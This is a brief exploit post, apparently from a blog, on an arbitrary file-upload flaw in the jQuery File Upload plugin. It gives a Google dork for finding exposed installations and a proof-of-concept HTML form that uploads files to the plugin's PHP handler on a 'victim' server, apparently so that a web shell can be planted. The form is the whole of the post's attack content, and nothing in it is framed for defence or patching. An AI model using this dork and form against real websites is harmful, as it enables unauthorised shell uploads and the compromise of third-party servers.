#- Title: jQuery File Upload Vulnerability
#- Author: People_hurt
#- Date: 17/02/2015
#- Developer : jQuery.com
#- Link Download : jquery. com/download/
#- Google Dork: inurl:"/jquery-file-upload/"
#- Fixed in Version : > 2.1.0
-- Proof Of Concept --
Code :
<form method="POST" action="victim,com /path/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell : Here
Tidak ada komentar:
Posting Komentar